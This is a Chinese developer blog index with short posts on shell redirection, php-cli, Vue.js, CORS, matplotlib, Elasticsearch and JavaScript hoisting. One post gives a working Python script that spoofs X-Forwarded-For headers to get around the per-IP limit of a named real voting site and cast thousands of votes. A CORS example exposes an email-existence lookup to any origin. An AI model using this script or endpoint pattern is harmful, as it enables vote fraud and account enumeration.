外贸独立站(日本)

专注外贸独立站建设

linux的输出定向

发表于 2016-12-30 更新于 2018-04-25

你懂的越多，懂你的越少。

最近Laravel文档里的一句配置引起了我的兴趣

1	* * * * * php /path/to/artisan schedule:run >> /dev/null 2>&1

她是什么意思呢？

shell中可能经常能看到：

1：> 代表重定向到哪里，例如：echo “123″ > /home/123.txt

2：/dev/null 代表空设备文件

3：2> 表示stderr标准错误

4：& 表示等同于的意思，2>&1，表示2的输出重定向等同于1

5：1 表示stdout标准输出，系统默认值是1，所以”>/dev/null”等同于 “1>/dev/null”

分解这个组合：“>/dev/null 2>&1” 为五部分。

因此，>/dev/null 2>&1也可以写成“1> /dev/null 2> &1”

那么本文标题的语句执行过程为：

1>/dev/null ：首先表示标准输出重定向到空设备文件，也就是不输出任何信息到终端，说白了就是不显示任何信息。

2>&1 ：接着，标准错误输出重定向到标准输出，因为之前标准输出已经重定向到了空设备文件，所以标准错误输出也重定向到空设备文件。

php-cli的使用

发表于 2016-12-28 更新于 2018-03-27

关山难越，谁悲失路之人？萍水相逢，尽是他乡之客。

HP作为一门web开发语言，通常情况下我们都是在Web Server中运行PHP，使用浏览器访问，因此很少关注其命令行操作以及相关参数的使用，但是，特别是在类Unix操作系统上，PHP可以作为一门脚本语言执行与shell类似的处理任务。 > 运行时间：php-cli默认运行时间是无穷，而网页php默认设置是30s。

常用操作

运行指定php文件

1
2
3

php my_script.php
 
php -f  "my_script.php"

运行php代码

1
2
3

php -r "print_r(get_defined_constants());"
// laravel安装时的一条命令
php -r "file_exists('.env') || copy('.env.example', '.env');"

语法检查
1
php -l index.php
查看版本信息
1
php -v
显示配置文件
1
php --ini

接收参数

<?php
echo '命令行参数个数: ' . $argc . "\n";
echo "命令行参数:\n";
foreach ($argv as $index => $arg) {
    echo "    {$index} : {$arg}\n";
}
// 执行命令
php console.php hello world

开启服务器

1 2	// 在指定目录下运行该命令，通过url访问http://localhost:8000/hello.php php -S localhost:8000

惊艳的vuejs

发表于 2016-12-26 更新于 2018-03-27

“大圣，此去欲何？” “踏南天，碎凌霄。” “若一去不回……” “便一去不回！”

### 双向数据绑定

<body id="app">
	<h1>hello</h1>
	<input type="radio" id="one" value="face" v-model="className">
	<input type="radio" id="two" value="msg" v-model="className">
	<div class="{{ className}}">
	    <h1>{{ textValue }}</h1>
	</div>
</body>

window.onload = function () {
	var dataList = {
		className : 'app',
		textValue : '你好'
		}

		new Vue({
		el:'#app',
		data: dataList
	});
}

计算属性

<body id="app">
	<h1>hello</h1>
	<div class="{{ className }}">
	    <h1>
	        a = {{a}}
	        b = {{b}}
	    </h1>
	</div>
</body>

window.onload = function () {
	var dataList = {
		className : 'app',
		textValue : '<i>你好</i>',
		a: 1
	}
	var vm = new Vue({
		el:'#app',
		data: dataList,
		computed: { b: function () {
		return this.a + 1;
	    }}
	});

	setTimeout(function () {
	vm.a = 4;
	}, 5000);
}

绑定class

<body id="app">
	<h1>hello</h1>
	<div class="{{ className }}">
	    <h1 class="com" v-bind:class="{'app': a, 'msg':b}">
		{{ fullName }}
	</h1>
	</div>
</body>

window.onload = function () {
	var dataList = {
		a : true,
		b : false,
		fullName: 'yangguoqi'
	}
	var vm = new Vue({
		el:'#app',
		data: dataList,
	});
	setTimeout(function () {
		vm.a = false;
		vm.b = true;
	},5000);
}

跨域资源共享CORS

发表于 2016-12-20 更新于 2018-04-08

我想，最好的感情是两个人都用力的活，一起体验人生的种种趣味，也能包容与鼓励对方。当对方为你打开新的世界，你就没有因为喜欢一个人而拒绝了整个世界。

CORS是一个W3C标准，全称是”跨域资源共享”（Cross-origin resource sharing）。
它允许浏览器向跨源服务器，发出XMLHttpRequest请求，从而克服了AJAX只能同源使用的限制。
CORS需要浏览器和服务器同时支持。目前，所有浏览器都支持该功能，IE浏览器不能低于IE10。
整个CORS通信过程，都是浏览器自动完成，不需要用户参与。对于开发者来说，CORS通信与同源的AJAX通信没有差别，代码完全一样。浏览器一旦发现AJAX请求跨源，就会自动添加一些附加的头信息，有时还会多出一次附加的请求，但用户不会有感觉。
因此，实现CORS通信的关键是服务器。只要服务器实现了CORS接口，就可以跨源通信。

两种请求

浏览器将CORS请求分成两类：简单请求（simple request）和非简单请求（not-so-simple request）。
只要同时满足以下两大条件，就属于简单请求。
1.请求方法是以下三种方法之一：

HEAD
GET
POST

2.HTTP的头信息不超出以下几种字段：

Accept
Accept-Language
Content-Language
Last-Event-ID
Content-Type：只限于三个值application/x-www-form-urlencoded、multipart/form-data、text/plain
凡是不同时满足上面两个条件，就属于非简单请求。
浏览器对这两种请求的处理，是不一样的。

预检请求

非简单请求是那种对服务器有特殊要求的请求，比如请求方法是PUT或DELETE，或者Content-Type字段的类型是application/json。
非简单请求的CORS请求，会在正式通信之前，增加一次HTTP查询请求，称为”预检”请求（preflight）。
浏览器先询问服务器，当前网页所在的域名是否在服务器的许可名单之中，以及可以使用哪些HTTP动词和头信息字段。只有得到肯定答复，浏览器才会发出正式的XMLHttpRequest请求，否则就报错。

“预检”请求用的请求方法是OPTIONS，表示这个请求是用来询问的。头信息里面，关键字段是Origin，表示请求来自哪个源。
为防止浏览器预检发出 options 请求时出现 404 错误，我们可以直接将 options请求结束掉；
以下是ThinkPHP 5利用行为特性解决跨域问题；

<?php

namespace app\api\behavior;

class CORS
{
    public function appInit(&$params)
    {
        header('Access-Control-Allow-Origin: *');
        header("Access-Control-Allow-Headers: token,Origin, X-Requested-With, Content-Type, Accept");
        header('Access-Control-Allow-Methods: POST,GET');
        if(request()->isOptions()){
            exit();
        }
    }
}

一个例子

jquery 请求

<script>
    $.ajax({
        type:"POST",
        url:"http://www.shop.dev/onValidateEmail",
        data:{email:"yangguoqi@olmailorg"},
        datatype: "json",
        success:function(data){
            console.log(data);
        },
        error: function(msg){
            console.log(msg);
        }
    });
</script>

服务端响应

Route::post('/onValidateEmail', function() {
    header("Access-Control-Allow-Origin: *");
    header("Access-Control-Allow-Methods: *");
    header("Content-Type: application/json");
    $email = post('email','');
    $count = \October\Rain\Auth\Models\User::where('email',$email)->count();
    return Response::json([
        'status' => 200,
        'data' => $count
    ]);

});

与JSONP的比较

CORS与JSONP的使用目的相同，但是比JSONP更强大。
JSONP只支持GET请求，CORS支持所有类型的HTTP请求。JSONP的优势在于支持老式浏览器，以及可以向不支持CORS的网站请求数据。

http://www.ruanyifeng.com/blog/2016/04/cors.html

用matplotlib绘制精美的图表

发表于 2016-12-13 更新于 2018-03-27

如果你爱一个人，一定要告诉他，不是为了要他报答，而是让他在以后黑暗的日子里，否定自己的时候，想起世界上还有人这么爱他，他并非一无是处。

### 安装方法

1	pip install matplotlib

绘制一元函数图像y=ax+b

创建single_variable.py，内容如下：

# coding:utf-8

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

import matplotlib.pyplot as plt
import numpy as np

plt.figure() # 实例化作图变量
plt.title('single variable') # 图像标题
plt.xlabel('x') # x轴文本
plt.ylabel('y') # y轴文本
plt.axis([0, 5, 0, 10]) # x轴范围0-5，y轴范围0-10
plt.grid(True) # 是否绘制网格线
xx = np.linspace(0, 5, 10) # 在0-5之间生成10个点的向量
plt.plot(xx, 2*xx, 'g-') # 绘制y=2x图像，颜色green，形式为线条
plt.show() # 展示图像

绘制正弦曲线y=sin(x)

创建sinx.py，内容如下：

# coding:utf-8

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

import matplotlib.pyplot as plt
import numpy as np

plt.figure() # 实例化作图变量
plt.title('single variable') # 图像标题
plt.xlabel('x') # x轴文本
plt.ylabel('y') # y轴文本
plt.axis([-12, 12, -1, 1]) # x轴范围-12到12，y轴范围-1到1
plt.grid(True) # 是否绘制网格线
xx = np.linspace(-12, 12, 1000) # 在-12到12之间生成1000个点的向量
plt.plot(xx, np.sin(xx), 'g-', label="$sin(x)$") # 绘制y=sin(x)图像，颜色green，形式为线条
plt.plot(xx, np.cos(xx), 'r--', label="$cos(x)$") # 绘制y=cos(x)图像，颜色red，形式为虚线
plt.legend() # 绘制图例
plt.show() # 展示图像

绘制多轴图

创建multi_axis.py内容如下：

# coding:utf-8

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

import matplotlib.pyplot as plt
import numpy as np

def draw(plt):
    plt.axis([-12, 12, -1, 1]) # x轴范围-12到12，y轴范围-1到1
    plt.grid(True) # 是否绘制网格线
    xx = np.linspace(-12, 12, 1000) # 在-12到12之间生成1000个点的向量
    plt.plot(xx, np.sin(xx), 'g-', label="$sin(x)$") # 绘制y=sin(x)图像，颜色green，形式为线条
    plt.plot(xx, np.cos(xx), 'r--', label="$cos(x)$") # 绘制y=cos(x)图像，颜色red，形式为虚线
    plt.legend() # 绘制图例

plt.figure() # 实例化作图变量
plt1 = plt.subplot(2,2,1) # 两行两列中的第1张图
draw(plt1)
plt2 = plt.subplot(2,2,2) # 两行两列中的第2张图
draw(plt2)
plt3 = plt.subplot(2,2,3) # 两行两列中的第3张图
draw(plt3)
plt4 = plt.subplot(2,2,4) # 两行两列中的第4张图
draw(plt4)

plt.show() # 展示图像

绘制3D图像

创建plot_3d.py，内容如下：

# coding:utf-8

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt

fig = plt.figure()
ax = fig.add_subplot(1,1,1,projection='3d')
theta = np.linspace(-4 * np.pi, 4 * np.pi, 500) # theta旋转角从-4pi到4pi，相当于两圈
z = np.linspace(0, 2, 500) # z轴从下到上,从-2到2之间画100个点
r = z # 半径设置为z大小
x = r * np.sin(theta) # x和y画圆
y = r * np.cos(theta) # x和y画圆
ax.plot(x, y, z, label='curve')
ax.legend()

plt.show()

3D散点图

创建plot_3d_scatter.py，内容如下：

# coding:utf-8

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt

fig = plt.figure()
ax = fig.add_subplot(1,1,1,projection='3d')
xx = np.linspace(0, 5, 10) # 在0-5之间生成10个点的向量
yy = np.linspace(0, 5, 10) # 在0-5之间生成10个点的向量
zz1 = xx
zz2 = 2*xx
zz3 = 3*xx
ax.scatter(xx, yy, zz1, c='red', marker='o') # o型符号
ax.scatter(xx, yy, zz2, c='green', marker='^') # 三角型符号
ax.scatter(xx, yy, zz3, c='black', marker='*') # 星型符号
ax.legend()

plt.show()

绘制3D表面

创建plot_3d_surface.py，内容如下：

# coding:utf-8

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import matplotlib.pyplot as plt
import numpy as np

fig = plt.figure()
ax = fig.gca(projection='3d')

X = np.arange(-5, 5, 0.25)
Y = np.arange(-5, 5, 0.25)
X, Y = np.meshgrid(X, Y)

Z = X**2+Y**2

ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=0, antialiased=False)

plt.show()

使用python操作elasticsearch

发表于 2016-12-13 更新于 2018-03-27

和你们这些少爷不同，我们光是活着就竭尽全力了。

Lately, here at Tryolabs, we started gaining interest in big data and search related platforms which are giving us excellent resources to create our complex web applications. One of them is Elasticsearch. Elastic{ON}15, the first ES conference is coming, and since nowadays we see a lot of interest in this technology, we are taking the opportunity to give an introduction and a simple example for Python developers out there that want to begin using it or give it a try. ### 1. What is Elasticsearch?

Elasticsearch is a distributed, real-time, search and analytics platform.

2. Yeah, but what IS Elasticsearch?

Good question! In the previous definition you can see all these hype-sounding tech terms (distributed, real-time, analytics), so let’s try to explain.
ES is distributed, it organizes information in clusters of nodes, so it will run in multiple servers if we intend it to.
ES is real-time, since data is indexed, we get responses to our queries super fast!
And last but not least, it does searches and analytics. The main problem we are solving with this tool is exploring our data!
A platform like ES is the foundation for any respectable search engine.

3. How does it work?

Using a restful API, Elasticsearch saves data and indexes it automatically. It assigns types to fields and that way a search can be done smartly and quickly using filters and different queries.
It’s uses JVM in order to be as fast as possible. It distributes indexes in “shards” of data. It replicates shards in different nodes, so it’s distributed and clusters can function even if not all nodes are operational. Adding nodes is super easy and that’s what makes it so scalable.
ES uses Lucene to solve searches. This is quite an advantage with comparing with, for example, Django query strings. A restful API call allows us to perform searches using json objects as parameters, making it much more flexible and giving each search parameter within the object a different weight, importance and or priority.
The final result ranks objects that comply with the search query requirements. You could even use synonyms, autocompletes, spell suggestions and correct typos. While the usual query strings provides results that follow certain logic rules, ES queries give you a ranked list of results that may fall in different criteria and its order depend on how they comply with a certain rule or filter.
ES can also provide answers for data analysis, like averages, how many unique terms and or statistics. This could be done using aggregations. To dig a little deeper in this feature check the documentation here.

4. Should I use ES?

The main point is scalability and getting results and insights very fast. In most cases using Lucene could be enough to have all you need.
It seems sometimes that these tools are designed for projects with tons of data and are distributed in order to handle tons of users. Startups dream of growing to that scenario, but may start thinking small first to build a prototype and then when the data is there, start thinking about scaling problems.
Does it make sense and pays off to be prepared to grow A LOT? Why not? Elasticsearch has no drawback and is easy to use, so it’s just a decision of using it to be prepared for the future.
I’m going to give you a quick example of a dead simple project using Elasticsearch to quickly and beautifully search for some example data. It will be quick to do, Python powered and ready to scale in case we need it to, so, best of both worlds.

5. Easy first steps with ES

For the following part it would be nice to be familiarized with concepts like Cluster, Node, Document, Index. Take a look at the official guide if you have doubts.
First things first, get ES from here.
I followed this video tutorial to get things started in just a minute. I recommend all you to check it out later.
Once you downloaded ES, it’s as simple as running bin/elasticsearch and you will have your ES cluster with one node running! You can interact with it at http://localhost:9200/
If you hit it you will get something like this:

{
  "status" : 200,
  "name" : "Delphine Courtney",
  "cluster_name" : "elasticsearch",
  "version" : {
    "number" : "1.4.2",
    "build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c",
    "build_timestamp" : "2014-12-16T14:11:12Z",
    "build_snapshot" : false,
    "lucene_version" : "4.10.2"
  },
  "tagline" : "You Know, for Search"
}

view rawes_first.json hosted with ❤ by GitHub
Creating another node is as simple as:
bin/elasticsearch -Des.node.name=Node-2
It automatically detects the old node as its master and joins our cluster. By default we will be able to communicate with this new node using the 9201 port http://localhost:9201. Now we can talk with each node and receive the same data, they are supposed to be identical.

6. Let’s Pythonize this thing!

To use ES with our all time favorite language; Python, it gets easier if we install elasticsearch-py package.
pip install elasticsearch
Now we will be able to use this package to index and search data using Python.

7. Let’s add some public data to our cluster

So, I wanted to make this project a “real world example”, I really did, but after I found out there is a star wars API (http://swapi.co/), I couldn’t resist it and ended up being a fictional - ”galaxy far far away” example. The API is dead simple to use, so we will get some data from there.
I’m using an IPython Notebook to do this test, I started with the sample request to make sure we can hit the ES server.

make sure ES is up and running

1
2
3

import requests
res = requests.get('http://localhost:9200')
print(res.content)

view rawes_first.py hosted with ❤ by GitHub
Then we connect to our ES server using Python and the elasticsearch-py library:
#connect to our cluster

1 2	from elasticsearch import Elasticsearch es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

view rawes_first3.py hosted with ❤ by GitHub
I added some data to test, and then deleted it. I’m skipping that part for this guide, but you can check it out in the notebook.
Now, using The Force, we connect to the Star Wars API and index some fictional people.
#let’s iterate over swapi people documents and index them

import json
r = requests.get('http://localhost:9200') 
i = 1
while r.status_code == 200:
    r = requests.get('http://swapi.co/api/people/'+ str(i))
    es.index(index='sw', doc_type='people', id=i, body=json.loads(r.content))
    i=i+1
 
print(i)

view rawes_first4.py hosted with ❤ by GitHub
Please, notice that we automatically created an index “sw” and a “doc_type” with de indexing command. We get 17 responses from swapi and index them with ES. I’m sure there are much more “people” in the swapi DB, but it seems we are getting a 404 with http://swapi.co/api/people/17. Bug report here! :-)
Anyway, to see if all worked with this few results, we try to get the document with id=5.
es.get(index=’sw’, doc_type=’people’, id=5)
view rawes_first10.py hosted with ❤ by GitHub
We will get Princess Leia:

{u'_id': u'5',
 u'_index': u'sw',
 u'_source': {u'birth_year': u'19BBY',
  u'created': u'2014-12-10T15:20:09.791000Z',
  u'edited': u'2014-12-20T21:17:50.315000Z',
  u'eye_color': u'brown',
  u'films': [u'http://swapi.co/api/films/1/',
   u'http://swapi.co/api/films/2/',
   u'http://swapi.co/api/films/3/',
   u'http://swapi.co/api/films/6/'],
  u'gender': u'female',
  u'hair_color': u'brown',
  u'height': u'150',
  u'homeworld': u'http://swapi.co/api/planets/2/',
  u'mass': u'49',
  u'name': u'Leia Organa',
  u'skin_color': u'light',
  u'species': [u'http://swapi.co/api/species/1/'],
  u'starships': [],
  u'url': u'http://swapi.co/api/people/5/',
  u'vehicles': [u'http://swapi.co/api/vehicles/30/']},
 u'_type': u'people',
 u'_version': 1,
 u'found': True}

view rawes_first5.py hosted with ❤ by GitHub
Now, let’s add more data, this time using node 2! And let’s start at the 18th person, where we stopped.

r = requests.get('http://localhost:9201')
i = 18
while r.status_code == 200:
   r = requests.get('http://swapi.co/api/people/'+ str(i))
   es.index(index='sw', doc_type='people', id=i,     body=json.loads(r.content))
   i=i+1

view rawes_first6.py hosted with ❤ by GitHub
We got the rest of the characters just fine.

8. Now, let’s try an interesting search

Where is Darth Vader? Here is our search query:
es.search(index=”sw”, body={“query”: {“match”: {‘name’:’Darth Vader’}}})
view rawes_first7.py hosted with ❤ by GitHub
This will give us both Darth Vader AND Darth Maul. Id 4 and id 44 (notice that they are in the same index, even if we use different node client call the index command). Both results have a score, although Darth Vader is much higher than Darth Maul (2.77 vs 0.60) since Vader is a exact match. Take that Darth Maul!

{u'_shards': {u'failed': 0, u'successful': 5, u'total': 5},
 u'hits': {u'hits': [{u'_id': u'4',
    u'_index': u'sw',
    u'_score': 2.7754524,
    u'_source': {u'birth_year': u'41.9BBY',
     u'created': u'2014-12-10T15:18:20.704000Z',
     u'edited': u'2014-12-20T21:17:50.313000Z',
     u'eye_color': u'yellow',
     u'films': [u'http://swapi.co/api/films/1/',
      u'http://swapi.co/api/films/2/',
      u'http://swapi.co/api/films/3/',
      u'http://swapi.co/api/films/6/'],
     u'gender': u'male',
     u'hair_color': u'none',
     u'height': u'202',
     u'homeworld': u'http://swapi.co/api/planets/1/',
     u'mass': u'136',
     u'name': u'Darth Vader',
     u'skin_color': u'white',
     u'species': [u'http://swapi.co/api/species/1/'],
     u'starships': [u'http://swapi.co/api/starships/13/'],
     u'url': u'http://swapi.co/api/people/4/',
     u'vehicles': []},
    u'_type': u'people'},
   {u'_id': u'44',
    u'_index': u'sw',
    u'_score': 0.6085256,
    u'_source': {u'birth_year': u'54BBY',
     u'created': u'2014-12-19T18:00:41.929000Z',
     u'edited': u'2014-12-20T21:17:50.403000Z',
     u'eye_color': u'yellow',
     u'films': [u'http://swapi.co/api/films/4/'],
     u'gender': u'male',
     u'hair_color': u'none',
     u'height': u'175',
     u'homeworld': u'http://swapi.co/api/planets/36/',
     u'mass': u'80',
     u'name': u'Darth Maul',
     u'skin_color': u'red',
     u'species': [u'http://swapi.co/api/species/22/'],
     u'starships': [u'http://swapi.co/api/starships/41/'],
     u'url': u'http://swapi.co/api/people/44/',
     u'vehicles': [u'http://swapi.co/api/vehicles/42/']},
    u'_type': u'people'}],
  u'max_score': 2.7754524,
  u'total': 2},
 u'timed_out': False,
 u'took': 44}

view rawes_first8.py hosted with ❤ by GitHub
So, this query will give us results if the word is contained exactly in our indexed data. What if we want to build some kind of autocomplete input where we get the names that contain the characters we are typing?
There are many ways to do that and another great number of queries. Take a look here to learn more. I picked this one to get all documents with prefix “lu” in their name field:
es.search(index="sw", body={"query": {"prefix" : { "name" : "lu" }}})
view rawes_first9.py hosted with ❤ by GitHub
We will get Luke Skywalker and Luminara Unduli, both with the same 1.0 score, since they match with the same 2 initial characters.

{u'_shards': {u'failed': 0, u'successful': 5, u'total': 5},
 u'hits': {u'hits': [{u'_id': u'1',
    u'_index': u'sw',
    u'_score': 1.0,
    u'_source': {u'birth_year': u'19BBY',
     u'created': u'2014-12-09T13:50:51.644000Z',
     u'edited': u'2014-12-20T21:17:56.891000Z',
     u'eye_color': u'blue',
     u'films': [u'http://swapi.co/api/films/1/',
      u'http://swapi.co/api/films/2/',
      u'http://swapi.co/api/films/3/',
      u'http://swapi.co/api/films/6/'],
     u'gender': u'male',
     u'hair_color': u'blond',
     u'height': u'172',
     u'homeworld': u'http://swapi.co/api/planets/1/',
     u'mass': u'77',
     u'name': u'Luke Skywalker',
     u'skin_color': u'fair',
     u'species': [u'http://swapi.co/api/species/1/'],
     u'starships': [u'http://swapi.co/api/starships/12/',
      u'http://swapi.co/api/starships/22/'],
     u'url': u'http://swapi.co/api/people/1/',
     u'vehicles': [u'http://swapi.co/api/vehicles/14/',
      u'http://swapi.co/api/vehicles/30/']},
    u'_type': u'people'},
   {u'_id': u'64',
    u'_index': u'sw',
    u'_score': 1.0,
    u'_source': {u'birth_year': u'58BBY',
     u'created': u'2014-12-20T16:45:53.668000Z',
     u'edited': u'2014-12-20T21:17:50.455000Z',
     u'eye_color': u'blue',
     u'films': [u'http://swapi.co/api/films/5/',
      u'http://swapi.co/api/films/6/'],
     u'gender': u'female',
     u'hair_color': u'black',
     u'height': u'170',
     u'homeworld': u'http://swapi.co/api/planets/51/',
     u'mass': u'56.2',
     u'name': u'Luminara Unduli',
     u'skin_color': u'yellow',
     u'species': [u'http://swapi.co/api/species/29/'],
     u'starships': [],
     u'url': u'http://swapi.co/api/people/64/',
     u'vehicles': []},
    u'_type': u'people'}],
  u'max_score': 1.0,
  u'total': 2},
 u'timed_out': False,
 u'took': 9}

view rawes_first11.py hosted with ❤ by GitHub
There are many other interesting queries we can do. If, for example, we want to get all elements similar in some way, for a related or correction search we can use something like this:
es.search(index=”sw”, body={“query”:
{“fuzzy_like_this_field” : { “name” :
{“like_text”: “jaba”, “max_query_terms”:5}}}})
view rawes_first1.py hosted with ❤ by GitHub
And we got Jabba although we had a typo in our search query. That is powerful!

{u'_shards': {u'failed': 0, u'successful': 5, u'total': 5},
 u'hits': {u'hits': [{u'_id': u'16',
    u'_index': u'sw',
    u'_score': 1.5700331,
    u'_source': {u'birth_year': u'600BBY',
     u'created': u'2014-12-10T17:11:31.638000Z',
     u'edited': u'2014-12-20T21:17:50.338000Z',
     u'eye_color': u'orange',
     u'films': [u'http://swapi.co/api/films/1/',
      u'http://swapi.co/api/films/3/',
      u'http://swapi.co/api/films/4/'],
     u'gender': u'hermaphrodite',
     u'hair_color': u'n/a',
     u'height': u'175',
     u'homeworld': u'http://swapi.co/api/planets/24/',
     u'mass': u'1,358',
     u'name': u'Jabba Desilijic Tiure',
     u'skin_color': u'green-tan, brown',
     u'species': [u'http://swapi.co/api/species/5/'],
     u'starships': [],
     u'url': u'http://swapi.co/api/people/16/',
     u'vehicles': []},
    u'_type': u'people'}],
  u'max_score': 1.5700331,
  u'total': 1},
 u'timed_out': False,
 u'took': 40}

view rawes_first2.py hosted with ❤ by GitHub

9. Next Steps

This was just a simple overview on how to set up your Elasticsearch server and start working with some data using Python. The code used here is publicly available in this IPython notebook.
We encourage you to learn more about ES and specially take a look at the Elastic stack where you will be able to see beautiful analytics and insights with Kibana and go through logs using Logstash.
In following posts we will talk about more advanced ES features and we will try to extend this simple test and use it to show a more interesting Django app powered by this data and by ES.
Hope this post was useful for developers trying to enter the ES world.
At Tryolabs we’re Elastic official partners. If you want to talk about Elasticsearch, ELK, applications and possible projects using these technologies, drop us a line to hello@tryolabs.com (or fill out this form) and we will be glad to connect!

javascript中作用域和变量提升

发表于 2016-12-12 更新于 2018-03-27

留给中国队的时间已经不多了。

“function函数”是一等公民！`编译阶段`，会把定义式的函数优先执行，也会把所有var变量创建，默认值为undefined，以提高程序的执行效率！总结：当JavaScript引擎解析脚本时，它会在预编译期对所有声明的变量和函数进行处理！并且是先预声明变量，再预定义函数！

变量提升

var v='Hello World';
(function(){
    alert(v);
    var v='I love you';
})()

提示说“undefined”

函数提升

函数声明方式提升【成功】

function myTest(){
    foo();
    function foo(){
        alert("我来自 foo");
    }
}
myTest();

函数表达式方式提升【失败】

function myTest(){
    foo();
   var foo =function foo(){
        alert("我来自 foo");
    }
}
myTest();

python投票和ip地址的伪造

发表于 2016-12-09 更新于 2021-09-10

全怪我们太穷了，又不认识人。

项目说明

投票地址：http://kepudasai.cdstm.cn/index.php?kepu-postvote
投票限制：IP，每个ip每天10票
提交方式：post
提交参数：{‘group’: ‘gaozhongzu’,’key’ : 10}

php获取IP问题

一般我们写的获取ip的方式：

function GetIP(){
    if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
        $cip = $_SERVER["HTTP_CLIENT_IP"];
    } elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
        $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
    } elseif (!empty($_SERVER["REMOTE_ADDR"])) {
        $cip = $_SERVER["REMOTE_ADDR"];
    } else {
        $cip = "0.0.0.0";
    }
    return $cip;
}

其实这是有问题的，通过header我们可以轻易改变ip：

$curl = curl_init();    //初始化一个curl对象  
curl_setopt($curl, CURLOPT_URL, "127.0.0.1/server.php"); 
$header = array(        //构造头部
    'CLIENT-IP:58.68.44.61', 
    'X-FORWARDED-FOR:58.68.44.61', 
); 

curl_setopt($curl, CURLOPT_HTTPHEADER, $header); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); 

$str = curl_exec($curl);    //执行请求  
curl_close($curl);    //关闭c
echo $str;    //输出抓取的结果

解决方法：
在判断的时候以$_SERVER["REMOTE_ADDR"]优先。

python脚本

初学，不喜勿喷

import threading
import random
import socket
import struct
import requests
import json
import time

url = 'http://kepudasai.cdstm.cn/index.php?kepu-postvote'

data = {'group': 'gaozhongzu','key' : 10}

def createHeader():
    ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
        'CLIENT-IP': ip,
        'X-FORWARDED-FOR': ip
    }
    return headers

def toupiao():
    index = 0
    headers = createHeader();
    while True:
        html = requests.post(url, data=data, headers=headers)
        result = json.loads(html.text)
        if(result['error'] == 1):
            time.sleep(random.randint(1, 3))
            headers = createHeader();
        else:
            index += 1
        if(index == 10000):
            print index
            break

toupiao()

关于http的一些知识

发表于 2016-12-08 更新于 2018-04-25

兴趣是最好的老师，其次是耻辱

简要说明

简言之，HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器我是从哪个页面链接过来的，服务器籍此可以获得一些信息用于处理。比如从我主页上链接到一个朋友那里，他的服务器就能够从HTTP Referer中统计出每天有多少用户点击我主页上的链接访问他的网站。

从一个https页面上的链接访问到一个非加密的http页面的时候，在http页面上是检查不到HTTP Referer的，比如当我点击自己的https页面下面的w3c xhtml验证图标（网址为http://validator.w3.org/check?uri=referer），从来都无法完成校验，提示：

No Referer header found!
原来，在http协议的rfc文档中有定义：

15.1.3 Encoding Sensitive Information in URI’s

…

Clients SHOULD NOT include a Referer header field in a (non-secure)
HTTP request if the referring page was transferred with a secure
protocol.
这样是出于安全的考虑，访问非加密页时，如果来源是加密页，客户端不发送Referer，IE一直都是这样实现的，Firefox浏览器也不例外。但这并不影响从加密页到加密页的访问。

详细论述

从一个https页面上的链接访问到一个非加密的http页面的时候，在http页面上是检查不到HTTP Referer的，但是这是在https中未做设置的情况下，如facebook，

http://serverfault.com/questions/520244/referer-is-passed-from-https-to-http-in-some-cases-how

常见性能优化策略的总结

发表于 2016-12-07 更新于 2022-03-14

我们走得太快，灵魂都跟不上了 ...

代码

之所以把代码放到第一位，是因为这一点最容易引起技术人员的忽视。很多技术人员拿到一个性能优化的需求以后，言必称缓存、异步、JVM等。实际上，第一步就应该是分析相关的代码，找出相应的瓶颈，再来考虑具体的优化策略。有一些性能问题，完全是由于代码写的不合理，通过直接修改一下代码就能解决问题的，比如for循环次数过多、作了很多无谓的条件判断、相同逻辑重复多次等。

数据库

数据库的调优，总的来说分为以下三部分：

SQL调优
这是最常用、每一个技术人员都应该掌握基本的SQL调优手段（包括方法、工具、辅助系统等）。这里以MySQL为例，最常见的方式是，由自带的慢查询日志或者开源的慢查询系统定位到具体的出问题的SQL，然后使用explain、profile等工具来逐步调优，最后经过测试达到效果后上线。这方面的细节，可以参考MySQL索引原理及慢查询优化。
架构层面的调优
这一类调优包括读写分离、多从库负载均衡、水平和垂直分库分表等方面，一般需要的改动较大，但是频率没有SQL调优高，而且一般需要DBA来配合参与。那么什么时候需要做这些事情？我们可以通过内部监控报警系统（比如Zabbix），定期跟踪一些指标数据是否达到瓶颈，一旦达到瓶颈或者警戒值，就需要考虑这些事情。通常，DBA也会定期监控这些指标值。
连接池调优
我们的应用为了实现数据库连接的高效获取、对数据库连接的限流等目的，通常会采用连接池类的方案，即每一个应用节点都管理了一个到各个数据库的连接池。随着业务访问量或者数据量的增长，原有的连接池参数可能不能很好地满足需求，这个时候就需要结合当前使用连接池的原理、具体的连接池监控数据和当前的业务量作一个综合的判断，通过反复的几次调试得到最终的调优参数。

缓存

本地缓存（HashMap/ConcurrentHashMap、Ehcache、Guava Cache等），缓存服务（Redis/Tair/Memcache等）。

使用场景
什么情况适合用缓存？考虑以下两种场景：

短时间内相同数据重复查询多次且数据更新不频繁，这个时候可以选择先从缓存查询，查询不到再从数据库加载并回设到缓存的方式。此种场景较适合用单机缓存。
高并发查询热点数据，后端数据库不堪重负，可以用缓存来扛。
选型考虑
如果数据量小，并且不会频繁地增长又清空（这会导致频繁地垃圾回收），那么可以选择本地缓存。具体的话，如果需要一些策略的支持（比如缓存满的逐出策略），可以考虑Ehcache；如不需要，可以考虑HashMap；如需要考虑多线程并发的场景，可以考虑ConcurentHashMap。
